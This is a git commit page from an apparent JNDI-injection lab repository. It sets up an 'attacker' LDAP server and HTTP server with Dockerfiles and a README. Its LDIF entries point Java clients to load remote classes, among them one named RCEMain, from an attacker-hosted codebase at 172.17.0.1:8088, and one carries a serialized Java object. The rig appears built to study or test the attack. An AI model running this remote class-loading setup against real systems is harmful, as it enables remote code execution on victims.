Browse Source

http server

master
Ivan Ivanov 8 months ago
parent
commit
31666b3148
  1. 4
      attacker/Dockerfile
  2. 26
      attacker/README.md
  3. 3
      attacker/http/Dockerfile
  4. 0
      attacker/http/src/FactoryClass.java
  5. 0
      attacker/http/src/MadeClass.java
  6. 0
      attacker/http/src/RCEMain.java
  7. 0
      attacker/http/src/SerializedClass.java
  8. 4
      attacker/ldap/Dockerfile
  9. 2
      attacker/ldap/made-class.ldif
  10. 4
      attacker/ldap/serialized-class.ldif

4
attacker/Dockerfile

@ -1,4 +0,0 @@
FROM osixia/openldap:1.5.0
COPY ldap/security /container/service/slapd/assets/config/bootstrap/ldif/02-security.ldif
COPY ldap/*.ldif /container/service/slapd/assets/config/bootstrap/ldif/custom/

26
attacker/README.md

@ -3,15 +3,29 @@
Hosts an ldap with data from ldap/*.ldif files
Hosts an HTTP server serving built classes from files in ./src
You have to compile those files with
javac http/src/*.java -d /http/output/
## Usage
Build and run
Build and run ldap
docker build ldap -t badldap
docker run --rm -d -p 1389:389 badldap
Test ldap
ldapsearch -x -H ldap://localhost:1389 -b 'dc=example,dc=org'
Build and run http
docker build http -t badhttp
docker run --rm -d -p 8088:3000 badhttp
cd attacker
docker build . -t badldap
docker run -d -p 1389:389 badldap
Everything
Test
docker kill `docker ps -f ancestor=badldap -f ancestor=badhttp --format "{{.Names}}"` 2> /dev/null; docker build ldap -t badldap; docker build http -t badhttp; docker run --rm -d -p 1389:389 badldap; docker run --rm -d -p 8088:3000 badhttp
ldapsearch -x -H ldap://localhost:1389 -b 'dc=example,dc=org'
Logs
for name in `docker ps -f ancestor=badldap -f ancestor=badhttp --format "{{.Names}}"`; do docker logs -f $name &; done

3
attacker/http/Dockerfile

@ -0,0 +1,3 @@
FROM lipanski/docker-static-website:latest
COPY output/* ./

0
attacker/src/FactoryClass.java → attacker/http/src/FactoryClass.java

0
attacker/src/MadeClass.java → attacker/http/src/MadeClass.java

0
attacker/src/RCEMain.java → attacker/http/src/RCEMain.java

0
attacker/src/SerializedClass.java → attacker/http/src/SerializedClass.java

4
attacker/ldap/Dockerfile

@ -0,0 +1,4 @@
FROM osixia/openldap:1.5.0
COPY security /container/service/slapd/assets/config/bootstrap/ldif/02-security.ldif
COPY *.ldif /container/service/slapd/assets/config/bootstrap/ldif/custom/

2
attacker/ldap/made-class.ldif

@ -1,7 +1,7 @@
dn: cn=made-class,dc=example,dc=org
cn: made-class
javaClassName: MadeClass
javaCodebase: http://localhost:8088/
javaCodebase: http://172.17.0.1:8088/
javaFactory: FactoryClass
objectClass: top
objectClass: javaContainer

4
attacker/ldap/serialized-class.ldif

@ -1,10 +1,10 @@
dn: cn=serialized-class,dc=ldap-registry,dc=attacker
dn: cn=serialized-class,dc=example,dc=org
cn: serialized-class
javaClassName: SerializedClass
javaClassNames: SerializedClass
javaClassNames: java.lang.Object
javaClassNames: java.io.Serializable
javaCodebase: http://attacker_codebase:80/
javaCodebase: http://172.17.0.1:8088/
javaSerializedData:: rO0ABXNyAA9TZXJpYWxpemVkQ2xhc3MAAAAAAAAAKgIAAUwAB21lc3N
hZ2V0ABJMamF2YS9sYW5nL1N0cmluZzt4cHQAG1NlcmlhbGl6ZWQgT2JqZWN0J3MgTWVzc2FnZQ=
=

Loading…
Cancel
Save